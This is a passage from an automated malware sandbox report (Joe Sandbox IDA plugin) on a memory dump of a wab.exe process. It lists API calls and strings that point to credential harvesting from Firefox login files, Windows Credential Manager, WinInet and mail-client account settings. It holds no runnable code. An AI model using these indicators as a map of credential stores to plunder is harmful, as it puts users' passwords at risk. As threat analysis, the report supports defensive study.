                                                                                              • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                              • API String ID: 710961058-601624466
                                                                                              • Opcode ID: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
                                                                                              • Instruction ID: c58e6c37e7046e1a5f8c637d7d1376bb8f99d5739874c3f6ad91cefff1898c28
                                                                                              • Opcode Fuzzy Hash: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
                                                                                              • Instruction Fuzzy Hash: 5F61BC31900258AFEF14DF58CC86E9E7B79EF08314F10019AF909AB1D2DB78AA51CB55
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: sprintf$memset$_mbscpy
                                                                                              • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                              • API String ID: 3402215030-3842416460
                                                                                              • Opcode ID: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                                                              • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                                                                              • Opcode Fuzzy Hash: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                                                              • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                                                • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                                                                                • Part of subcall function 004080D4: ??3@YAXPAX@Z.MSVCRT ref: 004080DB
                                                                                                • Part of subcall function 00407035: _mbscpy.MSVCRT ref: 0040703A
                                                                                                • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                                                • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                                                • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                                                • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                                                • Part of subcall function 0040DAC2: memcpy.MSVCRT ref: 0040DBD8
                                                                                                • Part of subcall function 0040DAC2: memcpy.MSVCRT ref: 0040DC38
                                                                                                • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                                                              • strlen.MSVCRT ref: 0040F139
                                                                                              • strlen.MSVCRT ref: 0040F147
                                                                                              • memset.MSVCRT ref: 0040F187
                                                                                              • strlen.MSVCRT ref: 0040F196
                                                                                              • strlen.MSVCRT ref: 0040F1A4
                                                                                              • memset.MSVCRT ref: 0040F1EA
                                                                                              • strlen.MSVCRT ref: 0040F1F9
                                                                                              • strlen.MSVCRT ref: 0040F207
                                                                                              • _strcmpi.MSVCRT ref: 0040F2B2
                                                                                              • _mbscpy.MSVCRT ref: 0040F2CD
                                                                                              • _mbscpy.MSVCRT ref: 0040F30E
                                                                                                • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                                                                                                • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: strlen$memset$_mbscpy$memcpy$??3@CloseFileHandleSize_mbscat_mbsicmp_strcmpistrrchr
                                                                                              • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                              • API String ID: 1613542760-3138536805
                                                                                              • Opcode ID: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                                                              • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                                                                              • Opcode Fuzzy Hash: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                                                              • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                                              • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                                                              • API String ID: 1012775001-1343505058
                                                                                              • Opcode ID: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                                                              • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                                                                              • Opcode Fuzzy Hash: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                                                              • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00444612
                                                                                                • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                              • strlen.MSVCRT ref: 0044462E
                                                                                              • memset.MSVCRT ref: 00444668
                                                                                              • memset.MSVCRT ref: 0044467C
                                                                                              • memset.MSVCRT ref: 00444690
                                                                                              • memset.MSVCRT ref: 004446B6
                                                                                                • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D296
                                                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                • Part of subcall function 0040D2A3: memcpy.MSVCRT ref: 0040D30F
                                                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                              • memcpy.MSVCRT ref: 004446ED
                                                                                                • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D248
                                                                                                • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D272
                                                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                              • memcpy.MSVCRT ref: 00444729
                                                                                              • memcpy.MSVCRT ref: 0044473B
                                                                                              • _mbscpy.MSVCRT ref: 00444812
                                                                                              • memcpy.MSVCRT ref: 00444843
                                                                                              • memcpy.MSVCRT ref: 00444855
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpymemset$strlen$_mbscpy
                                                                                              • String ID: salu
                                                                                              • API String ID: 3691931180-4177317985
                                                                                              • Opcode ID: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                                                                              • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                                                                                              • Opcode Fuzzy Hash: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                                                                              • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                                                                              • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                                                              • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$Library$FreeLoad
                                                                                              • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                              • API String ID: 2449869053-232097475
                                                                                              • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                              • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                                                                              • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                              • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sprintf.MSVCRT ref: 0040957B
                                                                                              • LoadMenuA.USER32(?,?), ref: 00409589
                                                                                                • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                                                                • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                                                                • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                                                                • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                                                              • DestroyMenu.USER32(00000000), ref: 004095A7
                                                                                              • sprintf.MSVCRT ref: 004095EB
                                                                                              • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                                                              • memset.MSVCRT ref: 0040961C
                                                                                              • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                                                              • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                                                                              • DestroyWindow.USER32(00000000), ref: 0040965C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                              • String ID: caption$dialog_%d$menu_%d
                                                                                              • API String ID: 3259144588-3822380221
                                                                                              • Opcode ID: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                                                                              • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                                                                                              • Opcode Fuzzy Hash: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                                                                              • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                                                              • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                              • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                              • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                              • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
• GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
• GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: AddressProc$Library$FreeLoad
• String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
• API String ID: 2449869053-4258758744
• Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
• Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
• Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
• Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
Uniqueness

Uniqueness Score: -1.00%

APIs
• RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
• memset.MSVCRT ref: 0040F84A
• RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040F877
• RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
• LocalFree.KERNEL32(?), ref: 0040F92C
• RegCloseKey.ADVAPI32(?), ref: 0040F937
• RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
• RegCloseKey.ADVAPI32(?), ref: 0040F95F
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
• String ID: Creds$ps:password
• API String ID: 551151806-1872227768
• Opcode ID: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
• Instruction ID: 67353d5813bb88842fab764933eebe3fab3d63e3b23d31051d6557c10b379f88
• Opcode Fuzzy Hash: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
• Instruction Fuzzy Hash: 71412BB6901209AFDB61DF95DC84EEFBBBCEB48715F0000B6F905E2150DA349A54CF64
Uniqueness

Uniqueness Score: -1.00%

APIs
• wcsstr.MSVCRT ref: 0040426A
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
• _mbscpy.MSVCRT ref: 004042D5
• _mbscpy.MSVCRT ref: 004042E8
• strchr.MSVCRT ref: 004042F6
• strlen.MSVCRT ref: 0040430A
• sprintf.MSVCRT ref: 0040432B
• strchr.MSVCRT ref: 0040433C
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
• String ID: %s@gmail.com$www.google.com
• API String ID: 3866421160-4070641962
• Opcode ID: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
• Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
• Opcode Fuzzy Hash: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
• Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
Uniqueness

Uniqueness Score: -1.00%

APIs
• _mbscpy.MSVCRT ref: 00409749
• _mbscpy.MSVCRT ref: 00409759
  • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
  • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,?,00001000,0045A448), ref: 00409355
  • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
• EnumResourceNamesA.KERNEL32(?,00000004,Function_0000955A,00000000), ref: 0040978F
• EnumResourceNamesA.KERNEL32(?,00000005,Function_0000955A,00000000), ref: 00409799
• _mbscpy.MSVCRT ref: 004097A1
• memset.MSVCRT ref: 004097BD
• LoadStringA.USER32(?,00000000,?,00001000), ref: 004097D1
  • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
• String ID: TranslatorName$TranslatorURL$general$strings
• API String ID: 1035899707-3647959541
• Opcode ID: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
• Instruction ID: 9d87356d66cebc64c7ffc1a8588b7925a858c7ffbf95e02bf5fcf8d8eff5f455
• Opcode Fuzzy Hash: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
• Instruction Fuzzy Hash: F711C87290016475F7312B569C46F9B3F5CDBCAB55F10007BBB08A71C3D6B89D408AAD
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: _strcmpi_strnicmpmemsetsprintf$strlen
• String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
• API String ID: 2360744853-2229823034
• Opcode ID: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
• Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
• Opcode Fuzzy Hash: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
• Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
Uniqueness

Uniqueness Score: -1.00%

APIs
• strchr.MSVCRT ref: 004100E4
• _mbscpy.MSVCRT ref: 004100F2
  • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
  • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
  • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
• _mbscpy.MSVCRT ref: 00410142
• _mbscat.MSVCRT ref: 0041014D
• memset.MSVCRT ref: 00410129
  • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
  • Part of subcall function 0040715B: _mbscpy.MSVCRT ref: 00407180
• memset.MSVCRT ref: 00410171
• memcpy.MSVCRT ref: 0041018C
• _mbscat.MSVCRT ref: 00410197
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
• String ID: \systemroot
• API String ID: 912701516-1821301763
• Opcode ID: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
• Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
• Opcode Fuzzy Hash: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
• Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: memcpy$strlen
• String ID: -journal$-wal$immutable$nolock
• API String ID: 2619041689-3408036318
• Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
• Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
• Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
• Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
• wcslen.MSVCRT ref: 0040874A
• _wcsncoll.MSVCRT ref: 00408794
• memset.MSVCRT ref: 0040882A
• memcpy.MSVCRT ref: 00408849
• wcschr.MSVCRT ref: 0040889F
• LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: AddressProc$FreeLibraryLoadLocal_wcsncollmemcpymemsetwcschrwcslen
• String ID: J$Microsoft_WinInet
• API String ID: 2203907242-260894208
• Opcode ID: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
• Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
• Opcode Fuzzy Hash: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
• Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
Uniqueness

Uniqueness Score: -1.00%

APIs
• UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
• UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410916
• UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
• memcpy.MSVCRT ref: 00410961
Strings
• 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
• 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410911
• 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0041091E
• 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: FromStringUuid$memcpy
• String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
• API String ID: 2859077140-2022683286
• Opcode ID: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
• Instruction ID: 9e6d0ab6f4d779539f8eb1da53a4fb6c135c1230b89e6f6df403d509513a9b08
• Opcode Fuzzy Hash: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
• Instruction Fuzzy Hash: AD1151B391011DAAEF11EEA5DC80EEB37ACAB45350F040027F951E3251E6B4D9458BA5
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
• _mbscpy.MSVCRT ref: 00409686
• _mbscpy.MSVCRT ref: 00409696
• GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
  • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: PrivateProfile_mbscpy$AttributesFileString
• String ID: TranslatorName$TranslatorURL$charset$general$rtl
• API String ID: 888011440-2039793938
• Opcode ID: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
• Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
• Opcode Fuzzy Hash: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
• Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
• unable to open database: %s, xrefs: 0042EBD6
• database is already attached, xrefs: 0042EA97
• cannot ATTACH database within transaction, xrefs: 0042E966
• out of memory, xrefs: 0042EBEF
• database %s is already in use, xrefs: 0042E9CE
• attached databases must use the same text encoding as main database, xrefs: 0042EAE6
• too many attached databases - max %d, xrefs: 0042E951
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: memcpymemset
• String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
• API String ID: 1297977491-2001300268
• Opcode ID: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                                                              • Instruction ID: 706ac67067754653a22c48b2dfc2d31ecc94a00d4abf430cd75191e688397775
                                                                                              • Opcode Fuzzy Hash: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                                                              • Instruction Fuzzy Hash: E5A1BFB16083119FD720DF26E441B1BBBE0BF84314F54491FF8998B252D778E989CB5A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                                                              • strchr.MSVCRT ref: 0040327B
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: PrivateProfileStringstrchr
                                                                                              • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                              • API String ID: 1348940319-1729847305
                                                                                              • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                              • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                                                              • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                              • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
